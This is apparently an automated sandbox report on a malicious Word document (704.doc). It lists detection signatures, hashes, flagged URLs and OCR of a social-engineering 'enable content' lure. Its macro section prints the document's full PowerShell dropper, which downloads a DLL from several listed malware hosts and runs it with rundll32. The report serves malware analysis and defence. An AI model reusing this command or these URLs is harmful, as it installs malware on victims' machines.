Windows Analysis Report 704.doc

Overview

General Information

Sample Name: 704.doc
Analysis ID: 526268
MD5: 40f85d07da2533d576b1f2d7c043a2da
SHA1: 60b84d70a6511483c6de131fb62e30a99edff5c4
SHA256: d05ec2a0134518ec74fcbee94a522c3837d82b7b5d2f162b8466850fc4f1be0d
Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Obfuscated command line found
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Machine Learning detection for sample
Document contains no OLE stream with summary information
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to detect virtual machines (SLDT)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges

AV Detection:

Antivirus detection for URL or domain
Source: http://ckfoods.net/wp-admin/wPInm2rgMu/ Avira URL Cloud: Label: malware
Source: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/ Avira URL Cloud: Label: malware
Source: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/ Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: 704.doc Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.435062374.0000000001F67000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp String found in binary or memory: http://adorwelding.zmo
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp String found in binary or memory: http://adorwelding.zmotp
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp String found in binary or memory: http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp String found in binary or memory: http://ckfoods.net/wp-admin/wP
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp String found in binary or memory: http://ckfoods.net/wp-admin/wPInm2rgMu/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp String found in binary or memory: http://huskysb.com/wordpre
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp String found in binary or memory: http://huskysb.com/wordpress/6f0qIQ
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp String found in binary or memory: http://huskysb.com/wordpress/6f0qIQlWPaYDfa/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp String found in binary or memory: http://manak.edunetf
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp String found in binary or memory: http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp String found in binary or memory: http://primtalent.com/wp-admin/9
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp String found in binary or memory: http://primtalent.com/wp-admin/9yt1u/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp String found in binary or memory: http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp String found in binary or memory: http://server.zmotpro.com/venkat/
Source: powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmp String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/
Source: powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmp String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P
Source: powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmp String found in binary or memory: http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE
Source: powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{58F32F91-EE55-4449-B0B3-F02D5B2E95D2}.tmp

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. i Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE@TENT" buttons to pcenew INS Document O CI D O Page, 1 of 1 I Wo
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED Prenewmg os not available for procecled documents CI You have to press "ENAB
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 12 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 10
Source: Screenshot number: 12 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. ii: ^ a S O I @ 100% G) A GE)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Source: ~DF59F33552EDE7EF7C.TMP.0.dr Stream path 'VBA/cvbku3gakuisdgfilu3gblaw' : found possibly 'ADODB.Stream' functions open, read, write
Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function fjow3efyw98efhasdokfhlnkvawofh3, API Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0:Integer) Name: fjow3efyw98efhasdokfhlnkvawofh3
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE, VBA macro line: JbxHook_Run_2__ob = jbxthis.Run(jbxparam0, jbxparam1)
Document contains no OLE stream with summary information
Source: 704.doc OLE indicator has summary info: false
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr OLE indicator has summary info: false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE indicator has summary info: false
Yara signature match
Source: C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP, type: DROPPED Matched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
Document has an unknown application name
Source: 704.doc OLE indicator application name: unknown
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr OLE indicator application name: unknown
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE indicator application name: unknown
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 704.doc OLE, VBA macro line: Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
Source: VBA code instrumentation OLE, VBA macro: Module cvbku3gakuisdgfilu3gblaw, Function Document_Open Name: Document_Open
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE, VBA macro line: Private Sub Document_Open()
Document contains embedded VBA macros
Source: 704.doc OLE indicator, VBA macros: true
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE indicator, VBA macros: true
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{E5E8E7CB-2989-4D3A-AE82-583348DFE60F}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF59F33552EDE7EF7C.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#.........n.....................................`I.........v.....................K...................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............ZU.k......................7.............}..v.... .......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../...............:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w..../...............ZU.k......................7.............}..v.... .......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;...............:T.k......T...............7.............}..v............0.b.....................~.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....;...............ZU.k....@.................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....G...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S...............:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....S...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._...............:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k...............:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w...............:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v....(.......0.b.....................l.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v....`.......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .......:T.k......................7.............}..v....."......0.b.............H.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k.....#................7.............}..v....($......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v....X.......0.b.............H.T.....$.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'...............:T.k......T...............7.............}..v....X.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....3...............:T.k......T...............7.............}..v....X.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....3...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....?...............:T.k......T...............7.............}..v....X.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....?...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....K...............:T.k......T...............7.............}..v....X.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....K...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....W...............:T.k......T...............7.............}..v....X.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....W...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....c...............:T.k......T...............7.............}..v....X.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....c...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....o...............:T.k......T...............7.............}..v....X.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....o...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....{...............:T.k......T...............7.............}..v....X.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....{...............ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....8.......0.b.............H.T.....4.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v....p ......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.....................l.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....W...............ZU.k......................7.............}..v....0.......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....c...............:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....c...............ZU.k......................7.............}..v....0.......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....o...............:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....o...............ZU.k......................7.............}..v....0.......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k......................7.............}..v....0.......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v.....$......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k.....%................7.............}..v....0&......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v.....,......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k.....-................7.............}..v....0.......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k....(3................7.............}..v.....3......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v....p:......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k....(;................7.............}..v.....;......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......?......0.b.............H.T.....4.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k.....@................7.............}..v.....A......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................:T.k......T...............7.............}..v....PF......0.b.....................l.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k.....G................7.............}..v.....G......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............ .......:T.k......T...............7.............}..v.....K......0.b.............H.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................ZU.k.....K................7.............}..v....PL......0.b...............T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k....H.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................l.k......T...............7.............}..v....h.......0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k.... .................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.6.4.9.............}..v............0.b...............T.....$.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'................m.k....h.................7.............}..v............0.b.............h.T.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....3................l.k......T...............7.............}..v............0.b.............................(............... Jump to behavior
